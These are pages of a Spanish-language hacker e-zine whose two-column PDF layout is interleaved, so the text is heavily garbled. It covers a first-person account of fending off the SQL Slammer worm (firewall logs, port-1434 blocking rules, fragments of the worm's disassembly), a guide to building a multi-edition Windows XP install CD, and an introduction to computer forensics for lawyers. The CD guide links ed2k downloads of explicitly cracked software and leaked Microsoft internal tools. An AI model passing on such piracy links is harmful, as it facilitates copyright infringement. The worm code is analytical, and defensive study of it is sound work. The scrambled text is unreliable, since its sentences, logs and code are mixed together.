El gusano empezo su ‘labor’ segun los reportes el Gracia Neo ;) Yo que soy tan docto en esto. :) 1434/udp open ms-sql-m

25 de Enero. Luego retorcediendo en el tiempo y Interesting ports on (192.168.1.200):


Port State Service
calculando las fechas en que se iniciaron nuestros Defini la ‘regla1434’; que original!!!; para loguear y 1434/udp open ms-sql-m
problemas, pues las fechas coincidian. :) bloquear las salidas desde el puerto 1434.
254 IP addresses (25 hosts up) scanned in 37 seconds
<------
Fue CODEado; si la RALE leyera esto :D; en ------>
1,[18/Feb/2003 12:47:29] Rule 'regla1434': Blocked: Out UDP
ensamblador para x86 localhost:1434->200.60.***.***:47416, Owner: C:\PROGRAM Ni modo, mas infectados. A parchar se~ores!. Asi
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[18/Feb/2003 12:47:29] Rule 'regla1434': Blocked: Out UDP es que luego de hacer el test con la principal sindi-
localhost:1434->200.60.***.***:47416, Owner: C:\PROGRAM
http://www.eeye.com/htmłResearch/Flash/sapp FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
<------
cada; es decir; con el server Web. Adivinen?. No
hire.txt funciono :). O Una demostracion mas de que no
http://securityresponse.symantec.com/avcenter/ soy bueno en Windows. Una vez instalado los
Analysis-SQLExp.pdf Defini otra regla ‘reglaII-1434’, y de esta forma parches, desactive el firewall y... kaboOOom!!!
bloquear las entradas al puerto UDP 1434.
Aqui tambien hay cosas en el codigo que me pare- Active el firewall cuando el router se congelo, y
------>
cen buenas. :) 1,[18/Feb/2003 20:17:27] Rule 'reglaII-1434': Blocked: In
esto fue lo que se me detallo, cientos de peticiones
UDP 62.24.142.109:4781->localhost:1434, Owner: C:\PROGRAM
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
eran bloqueadas, provocando que tuviera que
1,[18/Feb/2003 21:42:12] Rule 'reglaII-1434': Blocked: In
push 42B0C9DCh UDP 61.174.131.127:3736->localhost:1434, Owner: C:\PROGRAM reiniciar el server. :(
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
mov eax, 1010101h 1,[18/Feb/2003 21:57:56] Rule 'reglaII-1434': Blocked: In
UDP 209.5.218.230:1163->localhost:1434, Owner: C:\PROGRAM
xor ecx, ecx FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
------>
1,[19/Feb/2003 12:55:32] Rule 'regla1434': Blocked: Out
1,[18/Feb/2003 22:04:51] Rule 'reglaII-1434': Blocked: In
mov cl, 18h UDP 62.110.93.48:2754->localhost:1434, Owner: C:\PROGRAM
UDP localhost:1071->202.184.118.85:1434, Owner: C:\PROGRAM
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE 1,[19/Feb/2003 12:55:32] Rule 'regla1434': Blocked: Out
<------ UDP localhost:1071->18.230.66.59:1434, Owner: C:\PROGRAM
Esta es una session de recontruccion para realizar FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
Y bueno, alli estaba no?. :) 1,[19/Feb/2003 12:55:32] Rule 'regla1434': Blocked: Out
de manera optima el desbordamiento de pila. UDP localhost:1071->18.230.66.59:1434, Owner: C:\PROGRAM
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[19/Feb/2003 12:55:32] Rule 'regla1434': Blocked: Out
• Instalar los parches correspondientes; lo cual UDP localhost:1071->58.126.189.77:1434, Owner: C:\PROGRAM
push eax FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
aseguraba la eliminacion de la falla que explota 1,[19/Feb/2003 12:55:32] Rule 'regla1434': Blocked: Out
loop fixup_payload UDP localhost:1071->58.126.189.77:1434, Owner: C:\PROGRAM
el gusano; un peque~o parche de casi 140 Me- FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[19/Feb/2003 12:55:32] Rule 'regla1434': Blocked: Out
xor eax, 5010101h
gas... nada mas!... Eso lo bajo en 30 segundos. :D UDP localhost:1071->194.85.48.111:1434, Owner: C:\PROGRAM
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[19/Feb/2003 12:55:33] Rule 'regla1434': Blocked: Out
UDP localhost:1071->162.196.1.54:1434, Owner: C:\PROGRAM
con la XOReada define msg_type para la peticion
http://www.microsoft.com/sqłdownloads/2000/ FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[19/Feb/2003 12:55:33] Rule 'regla1434': Blocked: Out
de resolucion sql. :)
sp3.asp UDP localhost:1071->162.196.1.54:1434, Owner: C:\PROGRAM
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[19/Feb/2003 12:55:33] Rule 'regla1434': Blocked: Out
UDP localhost:1071->138.34.79.172:1434, Owner: C:\PROGRAM
xor ecx, 9B040103h
Los parches son acumulativos :-O, que descu- FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
1,[19/Feb/2003 12:55:33] Rule 'regla1434': Blocked: Out
xor ecx, 1010101h
brimiento!. Bueno al menos para mi si ;). Aqui van: UDP localhost:1071->138.34.79.172:1434, Owner: C:\PROGRAM
FILES\MICROSOFT SQL SERVER\MSSQL\BINN\SQLSERVR.EXE
push ecx <------

Sql2ksp3.exe.
Aqui se define el Puerto y la Familia de coneccion.
Updates for database components. Mientras tanto a~adi un par de reglas para con-
1434 / AF_INET. En realidad se define una es-
Sql2kasp3.exe. trolar las peticiones al puerto 1434. Hacia y desde
tructura para crear IP’s de propagacion.
Updates for Analysis Services components. mis maquinas de la intranet, que utilizan de
Sql2kdesksp3.exe. pasarela a mi Linux. :D
:-O
Updates for Microsoft SQL Server 2000 Desktop
Engine (MSDE 2000).

6 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

IpTables: Cuantas veces hemos querido tener varios pro-


$IPTABLES -A FORWARD -s 0/0 -p udp -d 0/0 Palabras Finales gramas a mano asi de la nada cuando falla nuestra
--dport 1433:1434 -j LOG pc y justo cuando sucede no encontramos instala-
Aqui viene la moraleja o idea consecuente a todo dores del Sistema operativo o el programita que
Claro que un -j LOG y un -j DROP ;) lo acontecido. Yo siempre me dedique y aun lo siempre usamos por que se perdió con la demas
Y definida $IPTABLES=[PathToIptables] hago; a ensimismarme en Linux y siempre pro- data.
bando diferentes sabores; y claro esta, a temas de
------> seguridad; pero siempre orientandome a Linux. Que tal si tuvieramos un
Mar 10 16:03:02 camaratru kernel: IN=eth1 OUT=eth0
SRC=206.138.105.51 DST=192.168.1.43 LEN=504 TOS=0x00 PREC=0x00 CD con varios sistemas
TTL=247 ID=452 DF PROTO=UDP SPT=53 DPT=1434 LEN=484
Mar 10 16:03:04 camaratru kernel: IN=eth1 OUT=eth0
Como lo dije en alguna parte del Texto, nunca operativos y otras utili-
SRC=206.138.105.51 DST=192.168.1.43 LEN=504 TOS=0x00 PREC=0x00
TTL=247 ID=474 DF PROTO=UDP SPT=53 DPT=1434 LEN=484
Mar 10 16:03:04 camaratru kernel: IN=eth1 OUT=eth0 habia estado tanto tiempo metido en temas rela- dades. Hecho por nosotros
SRC=206.138.105.50 DST=192.168.1.43 LEN=424 TOS=0x00 PREC=0x00
TTL=247 ID=59176 DF PROTO=UDP SPT=53 DPT=1434 LEN=404 cionados a Windows y paginas de M$. Alguien mismos y customizado de
Mar 10 16:03:08 camaratru kernel: IN=eth1 OUT=eth0
SRC=206.138.105.50 DST=192.168.1.43 LEN=424 TOS=0x00 PREC=0x00 tenia que hacer algo... alguien tenia que encontrar acuerdo a nuestras necesi-
TTL=247 ID=59217 DF PROTO=UDP SPT=53 DPT=1434 LEN=404
Mar 10 16:03:08 camaratru kernel: IN=eth1 OUT=eth0 una solucion. dades.
SRC=206.138.105.51 DST=192.168.1.43 LEN=504 TOS=0x00 PREC=0x00
TTL=247 ID=529 DF PROTO=UDP SPT=53 DPT=1434 LEN=484
<------
La primer herramienta con
De premisa somos informaticos; y eso ahora lo
la que debemos de contar y
entiendo mucho mejor. Si bien es cierto que no
con la que se hace posible la
podemos dominar todas las areas del conocimiento
creación de estos CDs es un
informatico, debe ser una autopromesa el ser mas
Entonces seguimos con el problema!... Hmm... software llamado CDIMAGE y lo empleamos para
liberares en nuestro pensamiento, respecto a que la
Seguimos navegando en la web de M$. Y yo que reducir el tamaño del iso. Es un software de Micro-
Seguridad NO se limita solo a un Sistema.
ya no queria hacerlo :(, pero bueno; alguien tiene soft para USO INTERNO SOLAMENTE. Ahora
que hacer el trabajo sucio. ;) A leer mirar, enlazar... ustedes se preguntarán... ¿Como reduce el tamaño
Con esto aprendi mucho. Es cierto que una buena
seguir... buscar... Llegamos a? del iso...? La respuesta es simple busca archivos
educacion y muchas lecturas en temas de seguri-
iguales y crea las rutas en el iso para que por
dad en Linux son aplicables a todos los sistemas.
SQL Server 2000 Security Tools ejemplo la carpeta /i386 del instalador de win-
Las buenas politicas de Seguridad Informatica,
http://www.microsoft.com/downloads/details.as dows aparesca varias veces pero que solo sea gra-
medidas preventivas, estacionarias y correctivas;
px?FamilyID=9552d43b-04eb-4af9-9e24-6cde4d933 bada una sola vez en el disco asi reduciendo con-
no son propietarias de un S.O.
600&DisplayLang=en ciderablemente el tamaño de la imagen. Ahora van
captando la idea?
El aplicar un Firewall, el saber donde buscar los
Leyendo un poco me llamo la atencion esto: Esta
parches adecuados, el manterner actualizado NO CDIMAGE es un programa de facil Uso, lo único
herramiento, ayuda a actualizar las ediciones de
solo el S.O., sino los programas adjuntos. Son que hay que hacer es preparar una iso, ya sea de
SQL Server 2000 y MSDE 2000 que son vulnerables
asuntos basicos de todo medianamente, buen ad- un Cdrom o deuna carpeta previamente grabada
al gusano. Las versiones de evalucion deben ser
ministrador. en el disco duro. Hay algunas opciones que te
actualizadas con este, no con el SP3...
permiten controlar varias propiedades del Cd
Espero en verdad que hayan pasado un momento (Etiqueta de Volumen, tiempo de grabación, nom-
Sera esa la razon, por la cual no funciono? :-O
entretenido, tal vez con bres largos, sector de arranque, etc.) pero lo que
algunas sonrisas o comentarios. =) Pero asi soy yo. hace posible crear un X en 1 es la opción -o “Opti-
Ni modo... a bajar otro parche de 22 megas.. uff!
mize storage by enconding duplicate files only
Titulo once” (Optimización de almacenamiento codifi-
license.rtf 14 KB
cando o grabando los archivos una unica vez) del
readme.txt 11 KB
Security_Tools_Guide.doc 113 KB El hombre que baila con un solo pie, es un per- cual les comente hace un rato.
SQLCritUpdPkg_ENU.exe 22193 KB sonaje de mi ciudad; al cual cierto dia; pude volver
a ver despues de mas de 15 a~os. Lo recuerdo Para que lo entiendas, en la versión del Windows
bailando con musica radial, en una calle de mi XP X en 1, no es que haya comprimido los 1.3 Gb
Adelante!... vamos al Readme.txt ;) ciudad y fue la imagen que considere, mejor que ocupa en un solo cd, sino que este programa
engloba la representacion de lo acontecido en esos identifica los archivos que hay iguales en las 2
Microsoft proporciona el Kit critico de Actualiza- dias. versiones y los copia UNA SOLA VEZ
cion SQL para asistir en detectar a las computa-
dores que son vulnerables al gusano Slammer y Por poner un ejemplo, el archivo llamado
Nos vemos!...
repararlas. Eso suena muUUucho mejor; pero Drivers.cab ocupa algo mas de 50 mb que en las 2
sigamos; esta herramienta se proporciona; como versiones serian 100 mb de esta forma solo graba-
es; sin garantias... Aqui la JO***!!! :-) mos 1 en vez de 2 con el consiguiente espacio libre.
“ Solo restan tres dias para tu cumplea~os
y mi regalo sera, no estar contigo. “ Ahora..
Nada mas hacer click en el archivo *.msi :)
Escrito originalmente para: Lo primero que nos hace falta es el programa
Listo... esperar como hace su trabajo. Bonitas ven- CDIMAGE (para crear la iso) Bajalo de aqui
tanas... -----------------------------------------------------------------
-=RareGaZz=- “ed2k://|file|CDIMAGE.EXE|110080|596EC293F
1996-2003, Derechos Reservados (c)
RST - http://www.RareGaZz.org 2E37CB8C22D0B2F24548417|/“ y tambien el ar-
-----------------------------------------------------------------
Bene. Todo parece estar bien. Ahora la prueba de chivo BOOT.BIN del sector de arranque del XP.
Fuego!!!. Desactivar el Firewall y solo resta esperar.
Pasaron 4 horas... 12 horas.... Y no paso nada. Y Para empezar, lo haremos con una 2 en 1 (XP Pro-
fueron felices hasta el proximo gusano que ataque Como hacer un TODO en UNO fesional y XP Home).
servidores M$ :) Ose que me duro 4 horas, porque Escrito por Xav|ce
Creamos en la unidad C: (por ejemplo) una carpeta
aparecio el gusano al puerto 445, jeje ;)
con el nombre WinXP2en1. Una vez que lo haya-
Esta vez tu podrás hacer tus propias compilaciones e mos hecho, creamos dentro de esta otras dos con el
Uf!...
incluir las herramientas que tu necesitas únicamente... nombre WXPVOL_ES y WXPHOM_ES y dentro de
ellas copiamos TODOS los archivos y carpetas de

Lo que hagas en la vida, tendrá eco en la eternidad. 7


S E C U R I T Y W A R I P R O J E C T S

cada version de windows (dentro de WXPVOL_ES de la versión Profesional). Una vez guardado, Esto hara que no te pida codigo de instalacion ni
el XP Pro Corp y dentro de WXPHOM_ES la ver- volvemos a modificar lo mismo pero esta vez por nombre de la pc y nombre del dueño y podemos
sion Home). Una vez hecho eso, debes de crear dos WHOM y lo guardamos de nuevo con el nombre hacer otras cosas mas... y modificando bien esto
carpetas mas, llamadas WPRO y WHOM. Dentro WHOMSECT.DAT (que será el arranque de la puedes hacer una instalacion en red desatendida o
de estas dos, deberás de copiar todos los archivos HOME). un cd con instalacion desatendida, pero eso ya es
de la carpeta i386 de cada versión. Ejemplo: de la otro tema que tocaremos en otro momento.
carpeta i386 de la Home, copiar TODO a la carpeta El archivo WPROSECT.DAT tiene que quedar así:
WHOM y así igual con la versión Profesional... 00000470h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 45 ; ..............SE
00000480h: 54 55 50 4C 44 52 2E 42 49 4E 42 4F 4F 54 46 49 ; TUPLDR.BINBOOTFI Ahora tenemos que modificar es el script en
00000490h: 58 2E 42 49 4E 49 33 38 36 00 00 00 00 00 00 00 ; X.BINWPRO.......
diskemu.cmd del directorio WinXP2en1 para que
Estas dos carpetas seran las encargadas de cargan y el archivo WHOMSECT.DAT tiene que quedar cuando pulsemos la opción deseada, arranque el
todos los drivers de la instalación bajo msdos. así: fichero WPROSECT.DAT o WHOMSECT.DAT.
00000470h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 45 ; ..............SE
Este fichero tiene que quedar configurado de la
PARA QUE BOOTEE 00000480h: 54 55 50 4C 44 52 2E 42 49 4E 42 4F 4F 54 46 49 ; TUPLDR.BINBOOTFI
00000490h: 58 2E 42 49 4E 49 33 38 36 00 00 00 00 00 00 00 ; X.BINWHOM.......
siguiente forma: (más o menos dependiendo de
Con esto hemos conseguido que cuando nos cada uno)
Una vez que ya
aparezca el menú de instalación, si elegimos insta- :start
tengamos todos cls
lar la versión Profesional, arrancará el fichero print
los archivos print
WPROSECT.DAT y si elegimos la opción Home, ------------------------------------------------------------------------------
copiados, ten- print Windows XP CD 2in1 con Profesional Corp y Home Edition
arrancará el fichero WHOMSECT.DAT. print
dremos que ------------------------------------------------------------------------------
print F1=Ayuda
copiar al direc- print
Una vez creado los dos archivos anteriores, tene-
torio print
print 1) Instalar Windows XP Professional Corporativa
mos que irnos a la carpeta WPRO y buscar el fich-
WinXP2en1 los print 2) Instalar Windows XP Home Edition print print
ero SETUPLDR.BIN. Abrirlo con un editor hexa- print d) Desarrollo->
archivos print q) Salir al simbolo del sistema
decimal y buscar en ASCII la cadena “I386”. Debe print r) Reiniciar
WIN51, print Esc) Arrancar desde el primer disco duro
de aparecer unas 4 veces. Cada vez que aparezca la print print Pulsa la tecla de la opcion que deseas:
WIN51IC (del XP Home) y WIN51IP (del XP profe- :mainkey
cambiaremos por “WPRO”. No debes dejar nin- ; El tiempo de espera son 20 segundos, tecla por defecto escape
sional). Ademas el boot.bin y el DiskEmu. Los getkey 20 esc
guna con I386. onkey 1 goto wpro
ficheros que trae el Diskemu son: Loader.bin (sec- onkey 2 goto whom
tor de arranque), disem1x.bin y diskemu.cmd onkey "X" goto (ruta) puedes agregar otro OS mas o otra version de Winsdows.
onkey d goto dev
Después y siempre dentro de la carpeta WPRO,
(archivo de comandos de NT). El DiskEmu lo po- onkey q salir
onkey r reiniciar
buscar al archivo TXTSETUP.SIF y abrirlo con el
dras bajar de “http://www.nu2.nu/diskemu/“ onkey f1 goto ayuda
Bloc de Notas. Una vez abierto buscar la cadena onkey esc boot 80
; Si no pulsamos una tecla valida volvemos a pedirla ...
“SetupSourcePath” y debe de aparecer esto “Set- goto mainkey
Todos estos ficheros debemos de ponerlos en el ;
upSourcePath=”\” Nosotros debemos modificarlo ..
directorio raiz (C:\WinXP2en1). :wpro
para que quede así:
Ahora hay que echar mano de un editor hexa- una vez terminado diskemu.cmd, ya tendremos el
decimal (WinHEX, Hex WorkShop, etc.) menú de instalación bajo msdos.
SetupSourcePath=”\WXPVOL_ES \”
Les voy a explicar como funciona el sistema de Para hacer el autorum y el menu grafico sobre
Una vez terminado con la carpeta WPRO, hacer lo
arranque del XP/2K. Windows, ,lo puedes hacer con “AutoPlay Media
mismo dentro de la carpeta WHOM. Ya sabes, Studio 6.0” con el que podrás exelentes resultados.
buscar el fichero SETUPDLR.BIN y cambiar i386
Primero la bios busca información de cd en el ar-
por WHOM. Después buscar TXTSETP.SIF y cam-
chivo BOOT.BIN. Una vez leído el BOOT.BIN le Descargalo de aqui:
biar el setupsourcepath por este SetupSourcePa-
dice “que vaya al directorio i386 donde encontrará ed2k://|file|Autoplay.Media.Studio.v6.0.0.0.Retai
th=”\WXPHOM_ES \” y con esto ya hemos ter-
el SETUPLDR.BIN y el BOOTFIX.BIN además de l.Cracked.Incl.Bonus.Pack-WDYL.rar|78855548|1
minado.
otros archivos importantes” Después el arranque F2AB807984E3E12B9999B56CA102C3C|/
de nuestro XP se va al directorio i386 y comienza a
Ahora teniendo en cuenta del archivo
mirar el contenido de algunos archivos importan- Una vez terminado tenemos que agregar los ar-
TXTSETP.SIF es solo un script de carga de para-
tes de los cuales una vez mas le dirán donde y que chivos del autorun a la carpeta raíz (WinXP2en1)
metros de instalacion asi como numero de serie,
copiar en el próximo paso de la instalación. De-
aceptar los form. y demas.. para mas informacion
berás prestar total atención a los 3 archivos sigui- Ahora tenemos que usar el programa CDIMAGE
es recomendable usar el OPK de windows la cual
entes, ya que seran muy importantes para poder copiamos este programa al disco duro C: y abri-
te permitira hace una instalacion desatendira,
realizar nuestro Multibootable Menú: mos el programa el uso es muy simple asi que no
puedes bajarlo de:
• SETUPREG.HIV requiere descripcion.
• SETUPLDR.BIN
ed2k://|file|Windows.Xp.Sp-2.Oem.Preinstallatio
• TXTSETUP.SIF al terminar obtendrás en “C:” la imagen ISO de un
n.Kit.(Winpe.Opk).Iso.rar|69036277|957F1A8F6B tamaño de 600 mb aprox con nuestra versión 2en1.
Bueno pues vamos a modificar: 474E9B3CF2E10928722007|/
Hemos dicho que en directorio raíz de nuestro Referencias
proyecto (WinXP2en1) hemos puesto el archivo ed2k://|file|Windows.Server.2003.Oem.Preinstall DiskEmu
BOOT.BIN. Pues hay que abrirlo con un editor ation.Kit.(Winpe.Opk).Iso.rar|177583102|7EF628 “http://www.nu2.nu/diskemu/“
hexadecimal y al final de fichero veras esto: F7E0B5B6E716FD938CAD439035|/ CDIMAGE
“ed2k://|file|CDIMAGE.EXE|110080|596EC293
Cada uno en su respectiva version para su sistema
00000470h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 45 ; ..............SE
00000480h: 54 55 50 4C 44 52 2E 42 49 4E 42 4F 4F 54 46 49 ; TUPLDR.BINBOOTFI F2E37CB8C22D0B2F24548417|/”
00000490h: 58 2E 42 49 4E 49 33 38 36 00 00 00 00 00 00 00 ; X.BINI386....... operativo. OPK
Si te fijas el BOOT.BIN apunta al directorio I386. “http://members.microsoft.com/partner/latam/o
Bien pues tenemos que modificar esto para que Tambien podriamos agregar el: em/centrøopk/default.aspx“
apunte al directorio que hemos creado para que [UserData] AutoPlay Media Studio 6.0
ProductKey = "XXXXX-XXXXX-XXXXX-XXXXX-XXXXX"
cargue los drivers (WPRO o WHOM). Cambiemos ComputerName = PCx “ed2k://|file|Autoplay.Media.Studio.v6.0.0.0.Ret
el i386 por WPRO y sin cerrarlo lo GUARDAMOS FullName = Dueño ail.Cracked.Incl.Bonus.Pack-WDYL.rar|78855548|
en la carpeta raíz (WXP2en1) con el nombre 1F2AB807984E3E12B9999B56CA102C3C|/”
WPROSECT.DAT (que será el archivo de arranque

8 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

gran mayoría de ellas; no toma conciencia de que etcétera. El uso indebido de los equipos de cóm-
en lo mas común de sus labores diarias, hay puto es lo que ha propiciado la regulación por
inmersas computadoras, en menor o mayor escala. parte del Derecho.
Desde el simple hecho de levantarse, con un reloj
digital, desde el simple hecho de colocarse un mp3 Las amenazas en los nuevos escenarios criminales
player para ir a hacer “footing”, desde el simple abarcan diversos tipos y clases de dispositivos
hecho de enceder su telefono celular, o PDA. No electrónicos; citemos; servidores, teléfonos
tanto como el tema de la pelicula cuya traducción móviles (celulares), PDAs (Asistentes Personales),
al español era “enemigo público”, donde el tío will LapTops, entre otros.
smith es vigilado por la NSA con tecnología de
Hay que tener muy presente que individuos con
punta. Pero es obvio que nuestros datos residen en
Agradecimientos elevados conocimientos y habilidades pueden
computadoras, y no solo en una, sino en varias.
Gracias a Borr@s de Darketernal porque por ellos tener acceso a casi cualquier objetivo. Los que
¿Como contralar la seguridad de nuestros datos?.
aprendi esto, y aun recuerdo el server raquelita.org estamos realacionados al mundo tecnológico,
Todo los peruanos; aparte de tener “el orgullo de
que en paz descanse. leemos día a día como son comprometidos sitios
ser peruanos y ser felices”; tenemos un DNI
Gracias a HaCKsPy por esperar y por ser mas que importantes en internet; como se realizan fraudes
(Documento Nacional de Identidad), el cual reside
un exelente amigo. con los bancos, como se transfiere dinero en cues-
en computadoras o servidores de la RENIEC,
Gracias a la “gentita” peruana y amigos extrageros tión de segundos o minutos; como se realiza la
tenemos un RUC (Registro Unico del
tambien de la Scene que cada vez que hablo con substracciónd e información confidencial en
Contribuyente); que reside en maquinas o
ellos mi cabeza vuela a 10 000 por hora. diversa escala, desde una foto familiar, hasta datos
servidores de la SUNAT, si tenemos automovil, los
personales de miles de personas que trabajan para
datos de éste, están en entidadades como SAT, si
Consultas o algo mas solo escriban a una corporación; como se originan nuevas especies
tenemos “algo de dinero”; y somos de aquellas
xav.ice@gmail.com de programas diseñados con propósitos nada
especies raras que ahorra; nuestros datos residen
santos; como es posible realizar llamadas telefóni-
en los Bancos, Crédito (donde cerraron mi cuenta,
cas sin costo algunos; además de ello, percibimos
Introducción al Computo Forense para Abo- y jamás me dieron una razon); BWS, Continental,
la evolución de técnicas, que nos enfrentan a una
gados & Afines Interbank, etc, todos esos bancos, almacenan
lucha constante de auto aprendizaje y educación,
nuestra información; si tenemos deudas, entramos
Escrito por ReYDeS dado que nada es estático en éste mundo.
en un sistema muy bonito denominado
24 de Julio del 2006. Trujillo, Perú “CERTICOM”; donde igualmente cualquiera Incidentes que se relacionan al Cómputo Fo-
puede consultar “nuestra honestidad y rense
puntualidad”. Moviendonos a casos mas simples,
No pretendo discriminar con el título del presente al comprar un pasaje de omnibus interprovincial,
artículo; pero lo que expondré en las siguiente nuevamente nuestros datos son requeridos, en
lineas; ha sido orientado a nuestros amigos aboga- algunos casos sino todos; somos ademas grabados
dos, jueces, fiscales, y demas personalidadades en video, y si todos tomamos conciencia de cada
relacionados al tema “legal”; ello no resta, que aspecto de nuestras vidas en los cuales nos
cualquiera pueda leer la presente introducción al relacionamos con algún “artefacto electrónico”,
tema; solo recalco su orientación. nos percataremos de la fragilidad y la
diseminación de nuestros datos. Es por ello que se
Estoy inmerso en el tema desde hace casi dos años, originan nuevos escenarios, donde es posible un
dos años en los cuales mas allá de descubrir un “delito” teniendo como una de sus bases, las
mundo fascinante, descubrí algo que cada uno de nuevas tecnologías.
nosotros debe de realizar; a mi modo de pensar; en 1. Robo de Código fuente o información Privada
algún momento de sus vidas, el compartir sus Delimitación Jurídica del Derecho Informático
conocimientos con las demás personas interesadas Uno de los activos o valores para las empresas en
en el tema; compartir lo que hemos aprendido y lo Se puede definir como la realización de una acción la información, como dice la frase tan diseminada
que estamos aprendiendo, para bienestar de una que reuniendo las características que delimitan el en internet “La información es poder”, y así es,
sociedad, una sociedad de la que; aunque muchas concepto de delito, sea llevada a cabo utilizando dado que con información es posible tomar las
reglas y leyes no comparto; es la sociedad que me un elemento informático o vulnerando los dere- desiciones correctas y adecuadas. Ésta información
(nos) ha tocado percibir. chos del titular de un elemento informático, sea debe ser protegida, y es precisamente ésta infor-
éste Hardware o Software. mación la que resulta más llamativa y punto ob-
Espero que en alguna ocasión algunos de ustedes; jetivo para un atacante. Y no solo hablamos de
Delitos Informáticos atacantes externos, tambien hablamos de atacantes
que en éste momento inician la lectura del presente
escrito, puedan presenciar una de mis presentacio- internos, los empleados dentro de nuestra propia
Las definimos como las conductas ilícitas sucepti-
nes, charlas o cursos. O porque no?. Que sea el empresa. Casos como el robo datos de miles de
bles de ser sancionadas por el derecho penal, los
inicio para que el tema de computer forensics sea personas de alguna universidad o entidad del
cuales hacen uso indebido de cualquier medio
mas conocido y sea algo tan vital; hablando del gobierno, no son ya, casos irreales; casos, donde se
informático. Cabe resaltar que en el Perú; aunque
aspecto Peruano; como la seguridad informática extravían de la misma manera laptops conteniendo
se han dado algunas leyes al respecto; aún existen
misma. Sin más preámbulo empecemos. similar tipo de datos, tampoco son extraños. Con el
algunos vacios legales, y no se han desarrollado
aumento de la movilidad de las personas y el
éste tipo de leyes como en otros paises de Sud
Nuevos Escenarios Criminales incremento de la capacidad de procesamiento y
América, y ni que decir de los amigos de Norte
almacenamientos, extraer datos o robar datos no es
América o Europa, donde cuentan con leyes es-
Sería engorroso y algo impensable.
tríctas, ademas de agencias o equipos de respuesta
reiterativo mencionar;
ante incidentes informáticos. 2. Robo de Archivos de Contraseñas o informa-
para los conocedores de
computadoras; lo que ción de Tarjetas de Crédito
Los delitos informáticos implican actividades
implica el día a día para criminales que en un inicio se han tratado de tipifi- Como lo mencionaba en el anterior punto, la
nuestras vidas los car en las figuras típicas de carácter tradicional, información es algo vital, y es precisamente esa
sistemas de computo. robo, hurto, fraude, falsificaciones, y un largo información el objetivo mas deseado por un ata-
Pero las personas; o la

Lo que hagas en la vida, tendrá eco en la eternidad. 9


S E C U R I T Y W A R I P R O J E C T S

cante. Si por un instante tomamos conciencia de lo mucho menos santos. Sigamos con el mismo ejem- Las intrusiones no autorizadas a sistemas de com-
que pasa cuando vamos a una cabina de internet a plo; bueno, pasas por alto dado que es el ex-novio puto son el pan de cada día, sin respetar, sistema
revisar el correo electrónico de la novia o conectar- y ella te dice que se tomaron esas fotos y bla bla operativo, tipos de programas, medidas de seguri-
nos a un sistema de mensajería instantanea, po- bla. Bueno, cierto día revisas tu correo electrónico dad, magnitud de la empresa, etc. La probabilidad
demos percatarnos que nada nos asegura que esa y ves un remitente desconocido con un Asunto de ser el objetivo de un “atacante” y que éste al-
computadora donde tan alegremente ingresamos llamativo; lo revisas; y te redirecciona a una página cance su objetivo, es directamente proporcional a
nuestro usuario y contraseña, no este siento vigi- donde te indica que debes depositar cierta canti- sus conocimientos e interés. Existen páginas en
lada remotamente por una tercera persona. Tal vez dad de dinero o ciertas fotos comprometedoras internet que se dedican a recopilar éste tipo de
el impacto no sea inmediato, pero en el más simple tuyas serán publicadas en internet. Pues es real, en acciones y manteners “Rankings” de los atacantes
de los casos, el atacante puede tan solo desear internet, existen páginas webs que se dedica a éste y sus objetivos.
nuestra dirección de corro eletrónico para relizar tipo de extorsiones, te piden a cambio un deposito
SPAM, o en el peor de los casos, cambiar nuestras via PayPal; por ejemplo; a cambio de que las fotos El Crecimiento de la Tecnología e internet facilita
contraseñas y tomar posesión de todas ellas; y si o videos, no sea publicados. Estas páginas webs; la manipulación y el acceso a la información. Para
realizados compras vía internet; de los datos de obviamente; están ubicadas en países donde las mi es grato que en mi ciudad; que no es la capital
nuestras tarjetas de crédito, con lo cual; en cuestión leyes no castigan éste tipo de actitudes, a miles de del Perú, obviamente; pueda ser posible que pueda
de minutos o mas pacientemente, horas, nuestra kilometros de donde resides. dar cursos y charlas sobre éste tema tan relativa-
tarjeta puede ser dejada en “cero”; literalmente mente nuevo; y sobre todo; orientarlo a los profe-
hablando. Soy de la opinión de que así como se 5. Ataques de Denegación de Servicio sionales del área legal. El año Pasado gracias a un
requiere una autorización o brevete para manejar instituto de Criminalística de mi ciudad, me fué
Visto de manera coloquial puede percibirse una posible dictar el Primer curso de Computo Fo-
un vehículo motorizado, así tambien debe de exis-
denegación de servicio como la imposibilidad de rense; experiencia reconfortante. Este año; dentro
tir algun tipo de control para manejar un equipo
enviar un mensaje de texto en “horas punta” vía la de un mes aproximadamente; se estará dictando el
de cómputo; aunque se perciba como radical. Con
página web de nuestro proveedor telefónico. Segundo Curso, con una duración de tres meses, y
ello creariamos una cultura de computadoras que
Bueno, esa no es la definición formal; como he está abierto a todo los interesados; claro, con va-
minimize éste tipo de acciones.
dicho; la definición formal atañe el hecho de que cantes limitadas. No trato de hacer apología al
3. SPAM o Correo electrónico no deseado un servicio no este disponible para usuarios instituto en cuestión, citando su nombre; pero en
legítimos. El “servicio” en el ejemplo anterior sería éste mundo es bueno ser agradecido, cuando te
La emoción de tener una cuenta de correo elec- “la capacidad para el envío de un mensaje de brindan oportunidades. Sean todos bienvenidos.
